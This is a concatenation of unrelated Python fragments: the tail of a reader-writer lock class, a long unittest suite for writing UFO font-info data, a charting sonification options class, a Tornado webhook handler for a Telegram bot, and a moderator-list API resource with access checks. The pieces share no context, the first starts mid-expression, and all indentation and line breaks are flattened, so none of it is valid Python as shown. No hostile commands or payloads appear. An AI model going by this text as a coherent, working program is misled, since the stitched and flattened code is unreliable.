timeout=((- 1) if (c_deadline is None) else max(0, (c_deadline - self.c_rw_lock.c_time_source()))))): self.c_rw_lock.c_lock_read_try.release() self.c_rw_lock.c_lock_read_entry.release() self.c_rw_lock.v_read_count.decrement() self.c_rw_lock.c_lock_read_count.release() return False self.c_rw_lock.c_lock_read_count.release() self.c_rw_lock.c_lock_read_try.release() self.c_rw_lock.c_lock_read_entry.release() self.v_locked = True return True def release(self) -> None: if (not self.v_locked): raise RELEASE_ERR_CLS(RELEASE_ERR_MSG) self.v_locked = False self.c_rw_lock.c_lock_read_count.acquire() self.c_rw_lock.v_read_count.decrement() if (0 == self.c_rw_lock.v_read_count): self.c_rw_lock.c_resource.release() self.c_rw_lock.c_lock_read_count.release() def locked(self) -> bool: return self.v_locked class _aWriter(LockableD): def __init__(self, p_RWLock: 'RWLockWriteD') -> None: self.c_rw_lock = p_RWLock self.v_locked: bool = False def acquire(self, blocking: bool=True, timeout: float=(- 1)) -> bool: p_timeout = (None if (blocking and (timeout < 0)) else (timeout if blocking else 0)) c_deadline = (None if (p_timeout is None) else (self.c_rw_lock.c_time_source() + p_timeout)) if (not self.c_rw_lock.c_lock_write_count.acquire(blocking=True, timeout=((- 1) if (c_deadline is None) else max(0, (c_deadline - self.c_rw_lock.c_time_source()))))): return False self.c_rw_lock.v_write_count += 1 if (1 == self.c_rw_lock.v_write_count): if (not self.c_rw_lock.c_lock_read_try.acquire(blocking=True, timeout=((- 1) if (c_deadline is None) else max(0, (c_deadline - self.c_rw_lock.c_time_source()))))): self.c_rw_lock.v_write_count -= 1 self.c_rw_lock.c_lock_write_count.release() return False self.c_rw_lock.c_lock_write_count.release() if (not self.c_rw_lock.c_resource.acquire(blocking=True, timeout=((- 1) if (c_deadline is None) else max(0, (c_deadline - self.c_rw_lock.c_time_source()))))): self.c_rw_lock.c_lock_write_count.acquire() self.c_rw_lock.v_write_count -= 1 if (0 == self.c_rw_lock.v_write_count): self.c_rw_lock.c_lock_read_try.release() self.c_rw_lock.c_lock_write_count.release() return False self.v_locked = True return True def downgrade(self) -> Lockable: if (not self.v_locked): raise RELEASE_ERR_CLS(RELEASE_ERR_MSG) self.c_rw_lock.v_read_count.increment() self.v_locked = False self.c_rw_lock.c_lock_write_count.acquire() self.c_rw_lock.v_write_count -= 1 if (0 == self.c_rw_lock.v_write_count): self.c_rw_lock.c_lock_read_try.release() self.c_rw_lock.c_lock_write_count.release() result = self.c_rw_lock._aReader(p_RWLock=self.c_rw_lock) result.v_locked = True return result def release(self) -> None: if (not self.v_locked): raise RELEASE_ERR_CLS(RELEASE_ERR_MSG) self.v_locked = False self.c_rw_lock.c_resource.release() self.c_rw_lock.c_lock_write_count.acquire() self.c_rw_lock.v_write_count -= 1 if (0 == self.c_rw_lock.v_write_count): self.c_rw_lock.c_lock_read_try.release() self.c_rw_lock.c_lock_write_count.release() def locked(self) -> bool: return self.v_locked def gen_rlock(self) -> 'RWLockWriteD._aReader': return RWLockWriteD._aReader(self) def gen_wlock(self) -> 'RWLockWriteD._aWriter': return RWLockWriteD._aWriter(self)
class WriteFontInfoVersion2TestCase(unittest.TestCase): def setUp(self): self.tempDir = tempfile.mktemp() os.mkdir(self.tempDir) self.dstDir = os.path.join(self.tempDir, 'test.ufo') def tearDown(self): shutil.rmtree(self.tempDir) def makeInfoObject(self): infoObject = TestInfoObject() for (attr, value) in list(fontInfoVersion2.items()): setattr(infoObject, attr, value) return infoObject def readPlist(self): path = os.path.join(self.dstDir, 'fontinfo.plist') with open(path, 'rb') as f: plist = plistlib.load(f) return plist def testWrite(self): infoObject = self.makeInfoObject() writer = UFOWriter(self.dstDir, formatVersion=2) writer.writeInfo(infoObject) writtenData = self.readPlist() for (attr, originalValue) in list(fontInfoVersion2.items()): newValue = writtenData[attr] self.assertEqual(newValue, originalValue) def testGenericWrite(self): infoObject = self.makeInfoObject() infoObject.familyName = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.styleName = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.styleMapFamilyName = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.styleMapStyleName = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.styleMapStyleName = 'REGULAR' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.versionMajor = '1' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.versionMinor = '0' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.copyright = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.trademark = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.unitsPerEm = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.descender = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.xHeight = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.capHeight = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.ascender = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.italicAngle = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) def testHeadWrite(self): infoObject = self.makeInfoObject() infoObject.openTypeHeadCreated = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeHeadCreated = '2000-Jan-01 00:00:00' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeHeadLowestRecPPEM = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeHeadFlags = [(- 1)] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) def testHheaWrite(self): infoObject = self.makeInfoObject() infoObject.openTypeHheaAscender = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeHheaDescender = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeHheaLineGap = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeHheaCaretSlopeRise = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeHheaCaretSlopeRun = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeHheaCaretOffset = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) def testNameWrite(self): infoObject = self.makeInfoObject() infoObject.openTypeNameDesigner = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeNameDesignerURL = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeNameManufacturer = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeNameManufacturerURL = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeNameLicense = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeNameLicenseURL = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeNameVersion = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeNameUniqueID = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeNameDescription = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeNamePreferredFamilyName = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeNamePreferredSubfamilyName = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeNameCompatibleFullName = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeNameSampleText = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeNameWWSFamilyName = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeNameWWSSubfamilyName = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) def testOS2Write(self): infoObject = self.makeInfoObject() infoObject.openTypeOS2WidthClass = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2WidthClass = 15 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2WeightClass = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject.openTypeOS2WeightClass = (- 50) writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2Selection = [(- 1)] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2VendorID = 1234 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2Panose = [0, 1, 2, 3, 4, 5, 6, 7, 8, str(9)] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2Panose = [0, 1, 2, 3] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2Panose = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2FamilyClass = [0, str(1)] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2FamilyClass = [1] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2FamilyClass = [1, 1, 1] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2FamilyClass = [1, 20] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2UnicodeRanges = ['0'] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2UnicodeRanges = [(- 1)] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2CodePageRanges = ['0'] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2CodePageRanges = [(- 1)] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2TypoAscender = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2TypoDescender = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2TypoLineGap = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2WinAscent = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2WinDescent = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2Type = ['1'] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2Type = [(- 1)] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2SubscriptXSize = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2SubscriptYSize = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2SubscriptXOffset = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2SubscriptYOffset = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2SuperscriptXSize = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2SuperscriptYSize = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2SuperscriptXOffset = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2SuperscriptYOffset = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2StrikeoutSize = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeOS2StrikeoutPosition = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) def testVheaWrite(self): infoObject = self.makeInfoObject() infoObject.openTypeVheaVertTypoAscender = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeVheaVertTypoDescender = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeVheaVertTypoLineGap = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeVheaCaretSlopeRise = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeVheaCaretSlopeRun = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.openTypeVheaCaretOffset = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) def testFONDWrite(self): infoObject = self.makeInfoObject() infoObject.macintoshFONDFamilyID = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.macintoshFONDName = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) def testPostscriptWrite(self): infoObject = self.makeInfoObject() infoObject.postscriptFontName = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptFullName = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptSlantAngle = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptUniqueID = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptUnderlineThickness = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptUnderlinePosition = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptIsFixedPitch = 2 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptBlueValues = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptBlueValues = [500] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptBlueValues = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptOtherBlues = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptOtherBlues = [500] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptOtherBlues = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptFamilyBlues = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptFamilyBlues = [500] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptFamilyBlues = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptFamilyOtherBlues = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptFamilyOtherBlues = [500] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptFamilyOtherBlues = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptStemSnapH = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptStemSnapH = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptStemSnapV = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptStemSnapV = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 110, 120, 130, 140, 150, 160] writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptBlueFuzz = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptBlueShift = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptBlueScale = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptForceBold = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptDefaultWidthX = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptNominalWidthX = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptWeightName = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptDefaultCharacter = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.postscriptWindowsCharacterSet = (- 1) writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.macintoshFONDFamilyID = 'abc' writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject) infoObject = self.makeInfoObject() infoObject.macintoshFONDName = 123 writer = UFOWriter(self.dstDir, formatVersion=2) self.assertRaises(UFOLibError, writer.writeInfo, info=infoObject)
class OptionSeriesLineSonificationDefaultinstrumentoptionsMapping(Options): def frequency(self) -> 'OptionSeriesLineSonificationDefaultinstrumentoptionsMappingFrequency': return self._config_sub_data('frequency', OptionSeriesLineSonificationDefaultinstrumentoptionsMappingFrequency) def gapBetweenNotes(self) -> 'OptionSeriesLineSonificationDefaultinstrumentoptionsMappingGapbetweennotes': return self._config_sub_data('gapBetweenNotes', OptionSeriesLineSonificationDefaultinstrumentoptionsMappingGapbetweennotes) def highpass(self) -> 'OptionSeriesLineSonificationDefaultinstrumentoptionsMappingHighpass': return self._config_sub_data('highpass', OptionSeriesLineSonificationDefaultinstrumentoptionsMappingHighpass) def lowpass(self) -> 'OptionSeriesLineSonificationDefaultinstrumentoptionsMappingLowpass': return self._config_sub_data('lowpass', OptionSeriesLineSonificationDefaultinstrumentoptionsMappingLowpass) def noteDuration(self) -> 'OptionSeriesLineSonificationDefaultinstrumentoptionsMappingNoteduration': return self._config_sub_data('noteDuration', OptionSeriesLineSonificationDefaultinstrumentoptionsMappingNoteduration) def pan(self) -> 'OptionSeriesLineSonificationDefaultinstrumentoptionsMappingPan': return self._config_sub_data('pan', OptionSeriesLineSonificationDefaultinstrumentoptionsMappingPan) def pitch(self) -> 'OptionSeriesLineSonificationDefaultinstrumentoptionsMappingPitch': return self._config_sub_data('pitch', OptionSeriesLineSonificationDefaultinstrumentoptionsMappingPitch) def playDelay(self) -> 'OptionSeriesLineSonificationDefaultinstrumentoptionsMappingPlaydelay': return self._config_sub_data('playDelay', OptionSeriesLineSonificationDefaultinstrumentoptionsMappingPlaydelay) def time(self) -> 'OptionSeriesLineSonificationDefaultinstrumentoptionsMappingTime': return self._config_sub_data('time', OptionSeriesLineSonificationDefaultinstrumentoptionsMappingTime) def tremolo(self) -> 'OptionSeriesLineSonificationDefaultinstrumentoptionsMappingTremolo': return self._config_sub_data('tremolo', OptionSeriesLineSonificationDefaultinstrumentoptionsMappingTremolo) def volume(self) -> 'OptionSeriesLineSonificationDefaultinstrumentoptionsMappingVolume': return self._config_sub_data('volume', OptionSeriesLineSonificationDefaultinstrumentoptionsMappingVolume)
class WebhookServ(tornado.web.RequestHandler): def data_received(self, chunk: bytes) -> Optional[Awaitable[None]]: pass def get(self): self.write('What are you doing here?') self.finish() def post(self): if (('Content-Length' in self.request.headers) and ('Content-Type' in self.request.headers) and (self.request.headers['Content-Type'] == 'application/json')): json_data = self.request.body.decode('utf-8') update = telebot.types.Update.de_json(json_data) bot.process_new_updates([update]) self.write('') self.finish() else: self.write('What are you doing here?') self.finish()
class VideoStreamModeratorList(ResourceList): def before_post(self, args, kwargs, data): require_relationship(['video_stream'], data) stream = safe_query_kwargs(VideoStream, data, 'video_stream') if (not has_access('is_coorganizer', event_id=stream.event_id)): raise ForbiddenError({'pointer': 'user_id'}, 'Co-Organizer access required') def after_create_object(self, video_stream_moderator, data, view_kwargs): send_email_to_moderator(video_stream_moderator) def query(self, view_kwargs): query_ = self.session.query(VideoStreamModerator) if (user_id := view_kwargs.get('user_id')): if (current_user.id != int(user_id)): raise ForbiddenError({'pointer': 'user_id'}, "Cannot access other user's data") user = safe_query_kwargs(User, view_kwargs, 'user_id') query_ = query_.filter_by(email=user.email) elif view_kwargs.get('video_stream_id'): stream = safe_query_kwargs(VideoStream, view_kwargs, 'video_stream_id') if (not has_access('is_coorganizer', event_id=stream.event_id)): raise ForbiddenError({'pointer': 'user_id'}, 'Co-Organizer access required') query_ = query_.filter_by(video_stream_id=view_kwargs['video_stream_id']) else: raise ForbiddenError({'pointer': 'query'}, 'Cannot query all moderators') return query_ view_kwargs = True decorators = (jwt_required,) methods = ['GET', 'POST'] schema = VideoStreamModeratorSchema data_layer = {'session': db.session, 'model': VideoStreamModerator, 'methods': {'query': query, 'after_create_object': after_create_object}}
